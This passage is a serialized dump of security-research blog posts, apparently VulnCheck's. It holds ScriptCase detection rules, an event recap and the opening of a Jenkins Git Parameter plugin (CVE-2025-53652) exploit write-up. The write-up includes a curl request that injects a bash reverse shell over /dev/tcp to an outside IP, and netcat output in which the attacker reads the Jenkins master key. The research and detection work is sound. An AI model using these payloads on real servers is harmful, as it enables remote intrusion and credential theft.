\\\n flow:established,to_server; \\\n http.method; content:\"POST\"; \\\n http.uri; content:\"\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Flogin.php\"; \\\n http.request_body; content:\"nm_action=\"; \\\n content:\"pass_new=\"; \\\n content:\"pass_conf=\"; \\\n content:\"email=\"; \\\n content:\"captcha=\"; \\\n reference:cve,CVE-2025-47227; \\\n classtype:web-application-attack; \\\n sid:12700625; rev:1; \\\n metadata: deployment Datacenter, deployment SSLDecrypt;)\n\nalert http any any -> any any ( \\\n msg:\"VULNCHECK NetMake ScriptCase CVE-2025-47228 Connection Command Injection\"; \\\n flow:established,to_server; \\\n http.method; content:\"POST\"; \\\n http.uri; content:\"\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Fadmin_sys_allconections_test.php\"; \\\n http.request_body; content:\"dbms\"; \\\n content:\"dbms\"; distance: 0; \\\n content:\"use_ssh=\"; \\\n pcre:\"\u002Fuse_ssh=[y|%59|%79]\u002Fi\"; \\\n pcre:\"\u002Fssh.*(\\;|%3a|>|%3e|%26|\\||%7c|\\\"|%22|\\$|%24|'|%27|`|%60)\u002Fi\"; \\\n reference:cve,CVE-2025-47228; \\\n classtype:web-application-attack; \\\n sid:12700631; rev:1; \\\n metadata: deployment Datacenter, deployment SSLDecrypt;)\n",[886,35718,35719,35724,35729,35734,35739,35744,35749,35754,35759,35764,35769,35774,35779,35784,35789,35793,35797,35802,35806,35810,35815,35820,35825,35830,35835,35840,35845,35849,35854],{"__ignoreMap":219},[1373,35720,35721],{"class":1375,"line":1376},[1373,35722,35723],{"class":9383},"alert http any any -> any any ( \\\n",[1373,35725,35726],{"class":1375,"line":220},[1373,35727,35728],{"class":9383}," msg:\"VULNCHECK NetMake ScriptCase CVE-2025-47227 Production Env Password Reset\"; \\\n",[1373,35730,35731],{"class":1375,"line":1266},[1373,35732,35733],{"class":9383}," flow:established,to_server; \\\n",[1373,35735,35736],{"class":1375,"line":1852},[1373,35737,35738],{"class":9383}," http.method; content:\"POST\"; \\\n",[1373,35740,35741],{"class":1375,"line":4692},[1373,35742,35743],{"class":9383}," http.uri; content:\"\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Flogin.php\"; \\\n",[1373,35745,35746],{"class":1375,"line":4724},[1373,35747,35748],{"class":9383}," http.request_body; content:\"nm_action=\"; \\\n",[1373,35750,35751],{"class":1375,"line":4756},[1373,35752,35753],{"class":9383}," content:\"pass_new=\"; \\\n",[1373,35755,35756],{"class":1375,"line":4768},[1373,35757,35758],{"class":9383}," content:\"pass_conf=\"; \\\n",[1373,35760,35761],{"class":1375,"line":4792},[1373,35762,35763],{"class":9383}," content:\"email=\"; \\\n",[1373,35765,35766],{"class":1375,"line":4798},[1373,35767,35768],{"class":9383}," content:\"captcha=\"; \\\n",[1373,35770,35771],{"class":1375,"line":4806},[1373,35772,35773],{"class":9383}," reference:cve,CVE-2025-47227; \\\n",[1373,35775,35776],{"class":1375,"line":4817},[1373,35777,35778],{"class":9383}," classtype:web-application-attack; \\\n",[1373,35780,35781],{"class":1375,"line":4825},[1373,35782,35783],{"class":9383}," sid:12700625; rev:1; \\\n",[1373,35785,35786],{"class":1375,"line":4835},[1373,35787,35788],{"class":9383}," metadata: deployment Datacenter, deployment SSLDecrypt;)\n",[1373,35790,35791],{"class":1375,"line":4843},[1373,35792,6520],{"emptyLinePlaceholder":237},[1373,35794,35795],{"class":1375,"line":4849},[1373,35796,35723],{"class":9383},[1373,35798,35799],{"class":1375,"line":4877},[1373,35800,35801],{"class":9383}," msg:\"VULNCHECK NetMake ScriptCase CVE-2025-47228 Connection Command Injection\"; \\\n",[1373,35803,35804],{"class":1375,"line":4915},[1373,35805,35733],{"class":9383},[1373,35807,35808],{"class":1375,"line":4931},[1373,35809,35738],{"class":9383},[1373,35811,35812],{"class":1375,"line":4947},[1373,35813,35814],{"class":9383}," http.uri; content:\"\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Fadmin_sys_allconections_test.php\"; \\\n",[1373,35816,35817],{"class":1375,"line":4952},[1373,35818,35819],{"class":9383}," http.request_body; content:\"dbms\"; \\\n",[1373,35821,35822],{"class":1375,"line":6776},[1373,35823,35824],{"class":9383}," content:\"dbms\"; distance: 0; \\\n",[1373,35826,35827],{"class":1375,"line":6781},[1373,35828,35829],{"class":9383}," content:\"use_ssh=\"; \\\n",[1373,35831,35832],{"class":1375,"line":7524},[1373,35833,35834],{"class":9383}," pcre:\"\u002Fuse_ssh=[y|%59|%79]\u002Fi\"; \\\n",[1373,35836,35837],{"class":1375,"line":7530},[1373,35838,35839],{"class":9383}," pcre:\"\u002Fssh.*(\\;|%3a|>|%3e|%26|\\||%7c|\\\"|%22|\\$|%24|'|%27|`|%60)\u002Fi\"; \\\n",[1373,35841,35842],{"class":1375,"line":7546},[1373,35843,35844],{"class":9383}," reference:cve,CVE-2025-47228; \\\n",[1373,35846,35847],{"class":1375,"line":7571},[1373,35848,35778],{"class":9383},[1373,35850,35851],{"class":1375,"line":7598},[1373,35852,35853],{"class":9383}," sid:12700631; rev:1; \\\n",[1373,35855,35856],{"class":1375,"line":7615},[1373,35857,35788],{"class":9383},[18,35859,35860,35861,35864,35865,35867],{},"On the host itself, exploitation on Windows creates a clear process chain: ",[886,35862,35863],{},"php-cgi.exe -> cmd.exe"," with a command line containing the injected payload. In the example below, Procmon captures ",[886,35866,14509],{}," launching as a direct result of the OS command injection.",[18,35869,35870],{},[68,35871],{":width":10862,"alt":35872,"src":35873},"ScriptCase exploitation as seen by procmon","\u002Fblog\u002Fscriptcase-rce\u002Fprocmon-view.png",[18,35875,35876],{},"In cases where the attacker drops a webshell instead of running commands directly, defenders should watch for unexpected files in:",[1354,35878,35881],{"className":35879,"code":35880,"language":1359},[1357],"\u003Cscriptface-webpath>\\scriptcase\\prod\\lib\\devel\\iface\\\n",[886,35882,35880],{"__ignoreMap":219},[18,35884,35885,35886,1554,35889,35891],{},"This is the default drop location, but since exploitation lets the attacker choose the path, shells can be written anywhere the web server process has write access. Any new or modified PHP file in the ScriptCase webroot should be treated as suspicious, especially if it contains one-line ",[886,35887,35888],{},"system()",[886,35890,1909],{}," calls.",[1920,35893,1903],{"id":1902},[18,35895,35896,35897,35899],{},"Whether you’re hunting, exploiting, or defending, the playbook is straightforward: know how to find vulnerable targets, understand how the exploit chain works, and have clear detection and response strategies in place. The attackers looking for ",[886,35898,34333],{}," aren’t waiting for you to patch, and the sooner you close these holes, the less likely you are to see your own server in someone else’s shell prompt.",[1920,35901,202],{"id":201},[18,35903,35904,35905,1246,35911,1246,35918,1255,35925,59],{},"The VulnCheck Initial Access team is always searching for new systems to pop shells on. For more research like this, see our blogs ",[47,35906,35908],{"href":32015,"rel":35907},[51],[1131,35909,35910],{},"Command Injection in Jenkins via Git Parameter",[47,35912,35915],{"href":35913,"rel":35914},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fhikvision-mount-shell",[51],[1131,35916,35917],{},"Novel Use of \"mount\" Spotted in Hikvision Attacks",[47,35919,35922],{"href":35920,"rel":35921},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Flinuxsys-cryptominer",[51],[1131,35923,35924],{},"The Linuxsys Coinmine",[47,35926,35929],{"href":35927,"rel":35928},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fjuniper-cve-2023-36845",[51],[1131,35930,35931],{},"Fileless Remote Code Execution on Juniper Firewalls",[18,35933,33941,35934,33945,35937,1240,35940,1246,35943,1255,35946,1260],{},[47,35935,1233],{"href":10806,"rel":35936},[51],[47,35938,1239],{"href":1237,"rel":35939},[51],[47,35941,1245],{"href":1243,"rel":35942},[51],[47,35944,1251],{"href":1249,"rel":35945},[51],[47,35947,216],{"href":1258,"rel":35948},[51],[1920,35950,2850],{"id":2849},[2901,35952,35953],{},"html pre.shiki code .s91G_, html code.shiki .s91G_{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sSBr1, html code.shiki .sSBr1{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sQqfL, html code.shiki .sQqfL{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#F8F8F2}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}",{"title":219,"searchDepth":220,"depth":220,"links":35955},[],"2025-08-14","A month after disclosure, hundreds of ScriptCase servers remain exposed and actively targeted. This post walks through finding vulnerable instances, exploiting them with just a few curl commands, and the key detection points defenders can use to stop attacks.",{"slug":35959},"scriptcase-rce","\u002Fblog\u002Fscriptcase-rce",{"title":34222,"description":35957},"blog\u002Fscriptcase-rce",[242,35964,23275,1281],"detections","aJtD_sAKP5T5P47doeGxheL9po_M-Ma1j2Azvnu8fIg",{"id":35967,"title":35968,"articles":35969,"authors":35970,"body":35972,"date":36173,"description":36174,"extension":234,"image":7,"link":7,"meta":36175,"navigation":237,"path":36176,"seo":36177,"series":7,"stem":36178,"subtype":7,"tags":36179,"__hash__":36180},"blog\u002Fblog\u002Fblackhat-2025-review.md","Dispatch from the Desert: VulnCheck at BlackHat, Security Wasteland, and DEFCON",[],[35971],{"name":3256,"avatar":3257,"link":3258,"linkName":3259},{"type":15,"value":35973,"toc":36164},[35974,35980,35987,35990,35996,36011,36019,36022,36028,36031,36037,36044,36056,36059,36065,36071,36074,36098,36101,36107,36110,36113,36116,36122,36125,36144,36150,36153,36155,36157],[18,35975,35976],{},[68,35977],{"alt":35978,"src":35979},"Defcon 33 Human Badge","\u002Fblog\u002Fblackhat-2025-review\u002Fdefcon-badge.png",[18,35981,35982,35983,35986],{},"This year marked my ",[295,35984,35985],{},"10th anniversary"," of parking myself in Vegas for a week of hacker summer camp, running into friends and “hacker family,” soaking up the latest research, and getting the update from colleagues on what they are building.",[18,35988,35989],{},"From a VulnCheck perspective, here’s what stood out over the week and a few predictions about where we’re headed as an industry in the latter half of 2025.",[61,35991,35993],{"id":35992},"security-wasteland",[295,35994,35995],{},"Security Wasteland",[18,35997,35998,35999,36001,36002,36007,36008,36010],{},"Year two of our off-strip event, ",[295,36000,35995],{},", was equal parts playground and laid-back lounge, hosted at the ",[47,36003,36006],{"href":36004,"rel":36005},"https:\u002F\u002Fwww.kmaeventcenterlasvegas.com\u002F",[51],"Keep Memory Alive Event Center"," -- a Frank Gehry fever dream of a building. We wanted a space that could fuel the party energy ",[1131,36009,297],{}," spark meaningful connections.",[22,36012,36013,36016],{},[25,36014,36015],{},"Hidden conversation nooks, rock music, and a chance to re-experience vinyl (Purple Rain, Led Zeppelin, Nirvana albums as swag).",[25,36017,36018],{},"Conversations about real exploitation data, swapping TTPs over drinks, and sharing stories you won’t find in any vendor deck.",[18,36020,36021],{},"We even had a custom latte art printer, which included a camera to put your face on the latte? Wild.",[18,36023,36024],{},[68,36025],{"alt":36026,"src":36027},"They put my face on a latte!","\u002Fblog\u002Fblackhat-2025-review\u002Fsecuritywastelandlatte.jpg",[18,36029,36030],{},"No badge scans, no awkward elevator pitches... just hackers, researchers, and defenders trading ideas. Judging by the late-night conversations, we nailed our goal.",[61,36032,36034],{"id":36033},"on-the-black-hat-floor",[295,36035,36036],{},"On the Black Hat Floor",[18,36038,36039,36040,36043],{},"Our booth was where ",[295,36041,36042],{},"real-world exploitation intel"," met the chaos of the business hall.\nEven though this year felt lighter on foot traffic, it worked in our favor, providing more time for long, honest conversations about the problems people are facing and the kind of intel they actually need. Special shoutout to the healthcare IT pro who gave me a deep dive into his toolset and threat model.",[22,36045,36046,36049],{},[25,36047,36048],{},"Live walk-throughs of active exploitation evidence.",[25,36050,36051,36052,36055],{},"Deep chats with red-teamers, threat intel analysts, and vulnerability managers about what ",[1131,36053,36054],{},"really"," matters in vuln prioritization.",[18,36057,36058],{},"We didn’t just hand out swag (though, yes, the tactical bracelets and water bottles disappeared fast), we traded knowledge. We even got to see the NOC's network threat hunt map in action.",[18,36060,36061],{},[68,36062],{"alt":36063,"src":36064},"Network Threat Hunt Map from the BlackHat NOC","\u002Fblog\u002Fblackhat-2025-review\u002Fblackhatnoc.jpg",[993,36066,36068],{"id":36067},"ai-in-the-wild",[295,36069,36070],{},"AI in the Wild",[18,36072,36073],{},"The AI booths this year were impossible to miss, but between the hype cycles were some solid working prototypes:",[22,36075,36076,36082,36091],{},[25,36077,36078,36081],{},[295,36079,36080],{},"AI SOCs"," - live demos of AI-assisted SOCs handling triage, threat hunting, and automated incident playbooks. Makes tons of sense to me as a former SOC manager as many events in an environment are repeatable patterns that once your analysts understand, should be automated out of the ecosystem.",[25,36083,36084,36087,36088,36090],{},[295,36085,36086],{},"AI Pentesting"," - chaining LLMs with exploit frameworks to map, probe, and even ",[1131,36089,22852],{}," targets with minimal human input. Exciting and terrifying in equal measure due to the way this could increase speed of exploitation across the board.",[25,36092,36093,36094,36097],{},"Purpose-built players like ",[295,36095,36096],{},"XBOW",", who I didn't realize was a whole entire company instead of just an AI hacking bot, showing how specialization lets you uncover huge vulnerability volumes in record time.",[18,36099,36100],{},"The takeaway from my perspective? AI in cybersecurity is making the move to displace the jobs that rely on repeatable, pattern-based circumstances -- pentesting first passes, phishing responses, and report writing.",[61,36102,36104],{"id":36103},"rolling-into-defcon",[295,36105,36106],{},"Rolling into DEFCON",[18,36108,36109],{},"When Black Hat shut down, a few of us stayed maybe a little too long, but not without the utmost excitement for what we encountered.",[18,36111,36112],{},"We made the rounds at the Defcon Villages including Aviation, Space, Hardware Hacking, ICS, and Blue Team Village, where defenders shared in depth detections, playbooks, and stories from the trenches. Some of the best takeaways came from hallway conversations, where the skillsets range from seasoned pro to right out of coding bootcamp.",[18,36114,36115],{},"The highlight here for me? The talks with the juniors in our industry who look at emerging threats in an entirely different way because they're not battle hardened like the rest of us. The talks with every person who tore apart a random piece of equipment they purchased off eBay to understand deeper how it works and then manipulate its abilities.",[1920,36117,36119],{"id":36118},"what-we-took-home",[295,36120,36121],{},"What We Took Home",[18,36123,36124],{},"Events like this keep us honest. They remind us why we do this work:",[22,36126,36127,36134,36137],{},[25,36128,36129,36130,36133],{},"To stay involved in the community that spots trends ",[1131,36131,36132],{},"before"," they hit the news.",[25,36135,36136],{},"To test our ideas against the toughest critics: the hackers themselves.",[25,36138,36139,36140,36143],{},"To keep VulnCheck rooted in ",[295,36141,36142],{},"hacker-informed exploit intelligence"," defenders can act on immediately.",[18,36145,36146,36147,36149],{},"To everyone who came to ",[295,36148,35995],{},", stopped by our booth, or swapped stories over vendor party canapés or drinks... thank you. Let’s keep the conversations going.",[18,36151,36152],{},"See you next year, Vegas!",[1308,36154],{},[993,36156,202],{"id":201},[18,36158,36159,36160,59],{},"Interested to talk with us out in the wild? Catch us at our ",[47,36161,36163],{"href":36162},"\u002Fevents","upcoming events",{"title":219,"searchDepth":220,"depth":220,"links":36165},[36166,36167,36170],{"id":35992,"depth":220,"text":35995},{"id":36033,"depth":220,"text":36036,"children":36168},[36169],{"id":36067,"depth":1266,"text":36070},{"id":36103,"depth":220,"text":36106,"children":36171},[36172],{"id":201,"depth":1266,"text":202},"2025-08-12","Recapping our 2025 BlackHat and Defcon experience.",{},"\u002Fblog\u002Fblackhat-2025-review",{"title":35968,"description":36174},"blog\u002Fblackhat-2025-review",[],"s861abzmqrPADFiaSaonIrlrSFHkPj51tD0ykn1GSpY",{"id":36182,"title":32017,"articles":36183,"authors":36200,"body":36202,"date":36729,"description":36730,"extension":234,"image":7,"link":7,"meta":36731,"navigation":237,"path":36733,"seo":36734,"series":7,"stem":36735,"subtype":7,"tags":36736,"__hash__":36737},"blog\u002Fblog\u002Fgit-parameter-rce.md",[36184,36188,36192,36196],{"title":36185,"source":12145,"link":36186,"date":36187},"15,000 Jenkins Servers at Risk from RCE Vulnerability (CVE-2025-53652)","https:\u002F\u002Fhackread.com\u002Fjenkins-servers-risk-rce-vulnerability-cve-2025-53652\u002F","2025-08-08",{"title":36189,"source":12153,"link":36190,"date":36191},"Critical command injection flaw in Jenkins Git Parameter plugin revealed","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fcybersecurity-alert-critical-command-injection-flaw-in-jenkins-git-parameter-plugin","2025-08-11",{"title":36193,"source":36194,"link":36195,"date":36173},"15,00 Jenkins Servers With Vulnerable Git Parameter Plugin Enables Command Injection","CyberSecurtyNews","https:\u002F\u002Fcybersecuritynews.com\u002F1500-jenkins-servers-with-vulnerable-git-parameter-plugin\u002F#google_vignette",{"title":36197,"source":3495,"link":36198,"date":36199},"Risky Bulletin: MadeYouReset vulnerability enables unlimited HTTP\u002F2 DDoS attacks","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-madeyoureset-vulnerability-enables-unlimited-http-2-ddos-attacks\u002F","2025-08-15",[36201],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":36203,"toc":36726},[36204,36207,36209,36228,36235,36239,36246,36252,36258,36264,36274,36280,36289,36295,36309,36339,36348,36373,36376,36391,36400,36442,36452,36456,36463,36471,36477,36492,36498,36501,36516,36519,36523,36526,36531,36538,36549,36552,36558,36565,36605,36608,36610,36613,36616,36618,36643,36660,36662,36666,36723],[263,36205],{":list":36206,"ico":266,"title":20},"[\"CVE-2025-53652 was disclosed as medium severity, but it enables command injection via the Jenkins Git Parameter plugin.\",\"Around 15,000 Jenkins servers appear to allow unauthenticated access, making RCE viable in the wild.\",\"The patch can be disabled, so detection remains important even after upgrading.\"]",[1920,36208,11648],{"id":11647},[18,36210,36211,36212,36217,36218,36221,36222,36227],{},"On July 9, Jenkins disclosed ",[47,36213,36216],{"href":36214,"rel":36215},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-53652",[51],"CVE-2025-53652"," (aka SECURITY-3419",[47,36219,467],{"href":36220},"#user-content-fn-1","), one of 31 plugin vulnerabilities announced that day. The vulnerability, affecting the ",[47,36223,36226],{"href":36224,"rel":36225},"https:\u002F\u002Fplugins.jenkins.io\u002Fgit-parameter\u002F",[51],"Git Parameter plugin",", was assigned a medium severity, and described as allowing attackers to \"inject arbitrary values in Git parameters\". That read to us as a parameter injection issue, something often dismissed as low-impact.",[18,36229,36230,36231,36234],{},"But this involved Git, and Git is not your average binary. It’s a well-known and versatile GTFObin",[47,36232,353],{"href":36233},"#user-content-fn-2",". We suspected that we could turn the parameter injection into remote code execution. Given the opportunity to do some GTFObin golfing, and with the plugin’s sizable install base, we decided to dig deeper.",[1920,36236,36238],{"id":36237},"unvalidated-git-parameters","Unvalidated Git Parameters",[18,36240,36241,36242,36245],{},"The issue is that the Git Parameter plugin accepts arbitrary values in parameter definitions, and those values are later used directly in shell commands. For example, the following pipeline configuration defines a job that operates on the ",[886,36243,36244],{},"master"," branch.",[18,36247,36248],{},[68,36249],{":width":10862,"alt":36250,"src":36251},"A normal pipeline configuration","\u002Fblog\u002Fgit-parameter-rce\u002Fconfig-normal.png",[18,36253,36254,36255,36257],{},"When the build runs with a normal value like ",[886,36256,36244],{},", everything behaves as expected.",[18,36259,36260],{},[68,36261],{":width":10862,"alt":36262,"src":36263},"Normal build output","\u002Fblog\u002Fgit-parameter-rce\u002Fnormal-output.png",[18,36265,36266,36267,36270,36271,59],{},"As shown above, the first command (",[886,36268,36269],{},"git rev-parse",") incorporates the user-provided parameter. We can confirm that this input is not validated by setting the branch to something like ",[886,36272,36273],{},"$(sleep 80)",[18,36275,36276],{},[68,36277],{":width":10862,"alt":36278,"src":36279},"A pipeline config with an exploit in it","\u002Fblog\u002Fgit-parameter-rce\u002Fconfig-exploited.png",[18,36281,36282,36283,36285,36286,59],{},"When the build runs with ",[886,36284,36273],{}," as the parameter, the injected command appears in the output, and the process hangs during ",[886,36287,36288],{},"git fetch",[18,36290,36291],{},[68,36292],{":width":10862,"alt":36293,"src":36294},"Exploited build output","\u002Fblog\u002Fgit-parameter-rce\u002Fexploited-output.png",[18,36296,36297,36298,36301,36302,36304,36305,36308],{},"A quick look at ",[886,36299,36300],{},"ps faux"," on the Jenkins host confirms that ",[886,36303,36288],{}," spawns a child process executing the attacker-supplied ",[886,36306,36307],{},"sleep"," command.",[1354,36310,36312],{"className":34366,"code":36311,"language":34368,"meta":219,"style":219},"USER PID COMMAND\njenkins 7 java -Duser.home=\u002Fvar\u002Fjenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -Dhudson.lifecycle=hudson.l\njenkins 6912 \\_ git fetch --tags --force --progress -- testuser@git:\u002Fhome\u002Ftestuser\u002Ftest_repo.git +refs\u002Fheads\u002F*:refs\u002Frem\njenkins 6916 \\_ \u002Fbin\u002Fsh \u002Fvar\u002Fjenkins_home\u002Fworkspace\u002FbuildName\u002F$(sleep 80)@tmp\u002Fjenkins-gitclient-ssh5385459547173378\njenkins 6917 \\_ sleep 80\n",[886,36313,36314,36319,36324,36329,36334],{"__ignoreMap":219},[1373,36315,36316],{"class":1375,"line":1376},[1373,36317,36318],{"class":9383},"USER PID COMMAND\n",[1373,36320,36321],{"class":1375,"line":220},[1373,36322,36323],{"class":9383},"jenkins 7 java -Duser.home=\u002Fvar\u002Fjenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -Dhudson.lifecycle=hudson.l\n",[1373,36325,36326],{"class":1375,"line":1266},[1373,36327,36328],{"class":9383},"jenkins 6912 \\_ git fetch --tags --force --progress -- testuser@git:\u002Fhome\u002Ftestuser\u002Ftest_repo.git +refs\u002Fheads\u002F*:refs\u002Frem\n",[1373,36330,36331],{"class":1375,"line":1852},[1373,36332,36333],{"class":9383},"jenkins 6916 \\_ \u002Fbin\u002Fsh \u002Fvar\u002Fjenkins_home\u002Fworkspace\u002FbuildName\u002F$(sleep 80)@tmp\u002Fjenkins-gitclient-ssh5385459547173378\n",[1373,36335,36336],{"class":1375,"line":4692},[1373,36337,36338],{"class":9383},"jenkins 6917 \\_ sleep 80\n",[18,36340,36341,36342,36344,36345,36347],{},"While ",[886,36343,36307],{}," demonstrates command injection, it doesn't cross any real security boundaries. To show practical impact, the following ",[886,36346,1557],{}," command can be used to trigger a reverse shell.",[1354,36349,36351],{"className":34366,"code":36350,"language":34368,"meta":219,"style":219},"curl -kv 'http:\u002F\u002Fjenkins:8080\u002Fjob\u002F[buildName]\u002Fbuild' -X POST \\\n -H 'Cookie: [cookie];' \\\n --data-urlencode 'Jenkins-Crumb=[crumb]' \\\n --data-urlencode 'json={\"parameter\":{\"name\":\"BRANCH_PARAM\",\"value\":\"\\$(bash -c \\\"bash &> \u002Fdev\u002Ftcp\u002F10.9.49.196\u002F1270 \u003C&1\\\")\"}}'\n",[886,36352,36353,36358,36363,36368],{"__ignoreMap":219},[1373,36354,36355],{"class":1375,"line":1376},[1373,36356,36357],{"class":9383},"curl -kv 'http:\u002F\u002Fjenkins:8080\u002Fjob\u002F[buildName]\u002Fbuild' -X POST \\\n",[1373,36359,36360],{"class":1375,"line":220},[1373,36361,36362],{"class":9383}," -H 'Cookie: [cookie];' \\\n",[1373,36364,36365],{"class":1375,"line":1266},[1373,36366,36367],{"class":9383}," --data-urlencode 'Jenkins-Crumb=[crumb]' \\\n",[1373,36369,36370],{"class":1375,"line":1852},[1373,36371,36372],{"class":9383}," --data-urlencode 'json={\"parameter\":{\"name\":\"BRANCH_PARAM\",\"value\":\"\\$(bash -c \\\"bash &> \u002Fdev\u002Ftcp\u002F10.9.49.196\u002F1270 \u003C&1\\\")\"}}'\n",[18,36374,36375],{},"To execute the attack, you'll need to provide three pieces of information:",[1789,36377,36378,36381,36384],{},[25,36379,36380],{},"The name of the build. All of our examples use “buildName”.",[25,36382,36383],{},"A valid session cookie (even when exploiting unauthenticated instances).",[25,36385,36386,36387,36390],{},"A Jenkins-Crumb (a CSRF token) for the ",[886,36388,36389],{},"\u002Fjob\u002F[buildName]\u002Fbuild"," endpoint.",[18,36392,36393,36394,36397,36398,59],{},"If successful, the server will respond with a ",[886,36395,36396],{},"201 Created",", and the reverse shell can be caught with ",[886,36399,30202],{},[1354,36401,36403],{"className":34366,"code":36402,"language":34368,"meta":219,"style":219},"albinolobster@lastpoint:~$ nc -lvnp 1270\nListening on 0.0.0.0 1270\nConnection received on 172.18.0.3 55664\nid\nuid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)\ncat ~\u002Fsecrets\u002Fmaster.key\n05322ff531f1b52117bf013b2fe77b40dacbc56268d68b9e234216fe825a0073a5c8051181033f630e67c408d58c3ef631e18ba8b8e6722e64d3c1380518e89a91b4256c5c348febceb24ef32f144045ed422dfb4bdc840aca33814989e431aa00db6df7c403da38247324783811d46c6f3caa1f9b1b26d979fff4391249ca8a\n",[886,36404,36405,36414,36418,36423,36427,36432,36437],{"__ignoreMap":219},[1373,36406,36407,36410,36412],{"class":1375,"line":1376},[1373,36408,36409],{"class":9372},"albinolobster@lastpoint:~",[1373,36411,4644],{"class":1383},[1373,36413,35379],{"class":4640},[1373,36415,36416],{"class":1375,"line":220},[1373,36417,35384],{"class":9383},[1373,36419,36420],{"class":1375,"line":1266},[1373,36421,36422],{"class":9383},"Connection received on 172.18.0.3 55664\n",[1373,36424,36425],{"class":1375,"line":1852},[1373,36426,9460],{"class":9383},[1373,36428,36429],{"class":1375,"line":4692},[1373,36430,36431],{"class":9383},"uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)\n",[1373,36433,36434],{"class":1375,"line":4724},[1373,36435,36436],{"class":9383},"cat 